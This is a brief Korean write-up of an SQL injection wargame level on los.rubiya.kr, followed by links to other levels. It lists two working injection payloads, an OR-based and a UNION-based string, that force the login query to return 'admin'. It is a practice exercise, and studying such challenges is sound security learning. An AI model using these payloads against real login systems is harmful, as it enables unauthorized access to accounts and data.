이번 문제는 PW만 입력이 가능하고 쿼리의 결과값을 출력해주지 않는다. 그리고 쿼리 결과값이 admin이면 문제가 해결된다.
딱히 필터가 없기에 기본적인 쿼리를 통해 문제가 해결된다.
풀이
pw='||id='admin'#
pw=' union select 'admin'#
..
los.rubiya.kr/golem (0) | 2018.12.28 |
---|---|
los.rubiya.kr/vampire (0) | 2018.12.24 |
los.rubiya.kr/troll (0) | 2018.11.15 |
los.rubiya.kr/orge (0) | 2018.11.15 |
los.rubiya.kr/darkelf (0) | 2018.11.15 |